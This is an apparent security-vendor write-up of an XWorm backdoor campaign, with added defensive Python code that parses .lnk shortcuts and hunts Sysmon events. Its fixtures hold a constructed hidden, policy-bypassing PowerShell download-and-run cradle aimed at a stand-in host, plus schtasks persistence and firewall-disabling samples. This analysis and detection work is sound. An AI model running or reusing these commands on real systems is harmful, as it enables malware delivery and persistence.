
XWorm Malware: New Infection Chain Bypasses Detection by Exploiting User and System Trust

Emerging quietly in mid-2025, the XWorm backdoor has developed into a highly sophisticated threat that exploits user confidence and system conventions. Initial reports indicated a sudden increase in phishing emails carrying .lnk shortcut files disguised as harmless documents. Security teams quickly discovered that these shortcuts launched hidden PowerShell routines instead of opening the expected files, signalling the emergence of a new infection chain. Within days, organisations across various sectors reported unusual network connections to unfamiliar IP addresses, suggesting an active Command and Control (C2) infrastructure. As the campaign progressed, Trellix analysts noted a significant shift from XWorm's earlier, more predictable tactics. The attackers abandoned simplistic batch scripts and obvious VBScript payloads in favour of a multi-stage mechanism that combines social engineering with technical subterfuge. The initial .lnk file, often delivered through targeted spear-phishing, drops a seemingly benign text artifact before stealthily fetching "discord.exe" from a remote host.
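The .lnk-to-PowerShell stage described above is the part a responder most often has to decode by hand. The following is an added example, not code from the original post or from Trellix: it walks the Shell Link (.lnk) binary format far enough to pull out the COMMAND_LINE_ARGUMENTS string, decodes any embedded base64 the way PowerShell's -EncodedCommand does (UTF-16LE), and scores the result for the download-cradle traits the article describes. The sample shortcut is constructed in the block itself (`build_lnk`, `SAMPLE_COMMAND`), and its URL uses a TEST-NET address as a stand-in for the real C2 host, so nothing here touches the network.

```python
import base64
import re
import struct

# LinkFlags bits from the MS-SHLLINK ShellLinkHeader (section 2.1.1).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                 (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk_strings(data: bytes) -> dict:
    """Walk a Shell Link file far enough to return its StringData fields (no COM needed, works offline)."""
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags, = struct.unpack_from("<I", data, 20)
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (2 bytes) followed by the ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:               # each StringData item: CountCharacters, then the string
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
# Indicator name -> pattern; evaluated over the raw arguments plus everything we managed to decode.
INDICATORS = (
    ("execution_policy_bypass", re.compile(r"-e\w*\s+bypass", re.I)),   # -ExecutionPolicy Bypass / -ep bypass
    ("hidden_window", re.compile(r"-w\w*\s+hidden", re.I)),             # -WindowStyle Hidden / -w hidden
    ("download", re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I)),
    ("execute", re.compile(r"start-process|invoke-expression|\biex\b", re.I)),
    ("temp_path", re.compile(r"\$env:temp|\\temp\\|appdata", re.I)),
)


def decode_base64_blob(blob: str):
    """Decode a base64 run the way PowerShell does for -EncodedCommand (UTF-16LE); None if not text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text.isascii() and text.isprintable():
            return text
    return None


def triage_lnk(data: bytes) -> dict:
    """Decode embedded base64 in the shortcut's arguments and score it as a download cradle."""
    args = parse_lnk_strings(data).get("arguments", "")
    decoded = [t for t in map(decode_base64_blob, BASE64_RUN.findall(args)) if t]
    haystack = " ".join([args, *decoded])
    indicators = sorted(name for name, pat in INDICATORS if pat.search(haystack))
    urls = URL_RE.findall(haystack)
    return {"arguments": args, "decoded": decoded, "urls": urls, "indicators": indicators,
            "suspicious": bool(urls) or len(indicators) >= 2}


def encode_command(command: str) -> str:
    """What the attacker does to produce an -EncodedCommand value: base64 over UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def build_lnk(arguments: str) -> bytes:
    """Constructed fixture: a minimal Unicode .lnk carrying only COMMAND_LINE_ARGUMENTS."""
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", HAS_ARGUMENTS | IS_UNICODE)
    header += bytes(0x4C - len(header))           # remaining header fields zeroed
    return header + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")


# Constructed stand-in for the one-liner the article describes; 198.51.100.10 is TEST-NET-2, not the real C2.
SAMPLE_COMMAND = ("(New-Object Net.WebClient).DownloadFile('http://198.51.100.10:5000/Discord.exe', "
                  "\"$env:TEMP\\Discord.exe\"); Start-Process \"$env:TEMP\\Discord.exe\" -WindowStyle Hidden")
SAMPLE_ARGS = "-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_command(SAMPLE_COMMAND)
SAMPLE_LNK = build_lnk(SAMPLE_ARGS)

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

The parser deliberately stops after StringData; ExtraData blocks that follow are irrelevant for this question. On a real sample, feed `triage_lnk` the bytes of the shortcut and read `decoded` before `urls`: attackers also hide the cradle in a bare base64 blob passed to FromBase64String rather than in -EncodedCommand, which is why the scan looks for any long base64 run instead of only the flag.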

Upon execution, the .NET-based executable unpacks and launches two additional components, main.exe and system32.exe, with the latter acting as the core XWorm payload. Once system32.exe establishes a foothold, it conducts thorough environment checks and aborts if it detects a sandbox or virtual machine. If the host is deemed genuine, the malware copies itself as Xclient.exe and ensures persistence by creating both a scheduled task and a registry Run key.

System defences are then dismantled. Windows Firewall policy is disabled by writing to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DisableFirewall, and PowerShell's execution policy is bypassed so that the malicious processes run unhindered and can be whitelisted. Note that the execution policy is a safety feature rather than a security boundary: passing -ExecutionPolicy Bypass on the command line is enough to sidestep it, so its bypass is an indicator to hunt for, not a control to rely on.

The heart of XWorm's new infection chain is its use of base64 encoding combined with Rijndael (AES) decryption, which keeps the payload concealed until execution. The initial .lnk file embeds a base64 string that decodes into a one-line PowerShell command; that command retrieves "discord.exe" from hxxp://85[.]203[.]4[.]232:5000/Discord.exe, saves it to the user's Temp directory, and launches it silently.
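The persistence and defence-evasion steps above (Run key, scheduled task, firewall policy value, hidden encoded PowerShell) each leave registry and process-creation telemetry. As an added example, not code from the original post or from Trellix, the block below runs four hunting rules over Sysmon-shaped events (EventID 13 registry value set, EventID 1 process create; field names are Sysmon's, the values are constructed for this example). File paths, the user SID and the schtasks command line are invented; the rule for Run keys keys on the *writing* process living in a user-writable directory rather than on the Run value itself, because legitimate software (the OneDrive event in the sample) also persists from AppData.

```python
import re

# Directories a standard user can write to; a persistence entry written *by* a process living here is the signal.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
FIREWALL_POLICY = re.compile(r"\\Policies\\Microsoft\\WindowsFirewall\\", re.I)
# The article reports a DisableFirewall value set to 1; the documented policy value is EnableFirewall
# under the profile subkeys, set to 0. Match both spellings of "firewall off".
FIREWALL_OFF = re.compile(r"DisableFirewall\b.*\b0x0*1\b|EnableFirewall\b.*\b0x0*0\b", re.I)
ENCODED_PS = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)   # -e / -ec / -enc / -EncodedCommand
QUIET_PS = re.compile(r"-w\w*\s+hidden|-e\w*\s+bypass", re.I)                       # -WindowStyle Hidden, -ExecutionPolicy Bypass


def hunt(events):
    """Apply four XWorm-shaped rules to Sysmon-style events; returns one finding per matching event."""
    findings = []
    for i, ev in enumerate(events):
        eid = ev.get("EventID")
        image = ev.get("Image", "").lower()
        rule = None
        if eid == 1:                                   # process creation
            cmd = ev.get("CommandLine", "")
            if image.endswith("powershell.exe") and ENCODED_PS.search(cmd) and QUIET_PS.search(cmd):
                rule = "encoded_hidden_powershell"
            elif (image.endswith("schtasks.exe") and "/create" in cmd.lower()
                  and USER_WRITABLE.search(ev.get("ParentImage", ""))):
                rule = "schtasks_from_user_writable"
        elif eid == 13:                                # registry value set
            target = ev.get("TargetObject", "")
            if RUN_KEY.search(target) and USER_WRITABLE.search(image):
                rule = "run_key_by_user_writable_process"
            elif FIREWALL_POLICY.search(target) and FIREWALL_OFF.search(target + " " + ev.get("Details", "")):
                rule = "firewall_policy_disabled"
        if rule:
            findings.append({"index": i, "rule": rule, "image": ev.get("Image", "")})
    return findings


# Constructed sample telemetry (paths, SID and the base64 blob are made up; the blob is truncated).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand "
                    "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAA=="},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\system32.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Xclient",
     "Details": r"C:\Users\alice\AppData\Roaming\Xclient.exe"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\system32.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DisableFirewall",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\system32.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 1 /tn "Xclient" /tr "C:\Users\alice\AppData\Roaming\Xclient.exe" /f'},
    # Benign: explorer.exe (not user-writable) registering OneDrive, which legitimately lives under AppData.
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The rules are intentionally narrow. Correlating them is where the value is: a hidden encoded PowerShell launch followed within minutes by a Run-key write and a schtasks /create from a process in Temp is the chain the article describes, whereas any one of them alone is noisy on a developer workstation.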

Categories: Malware Evolution, Phishing Techniques, Infection Mechanism 

Tags: XWorm, Backdoor, Phishing, PowerShell, Command and Control, Malware, Persistence, Base64, Decryption, Social Engineering 
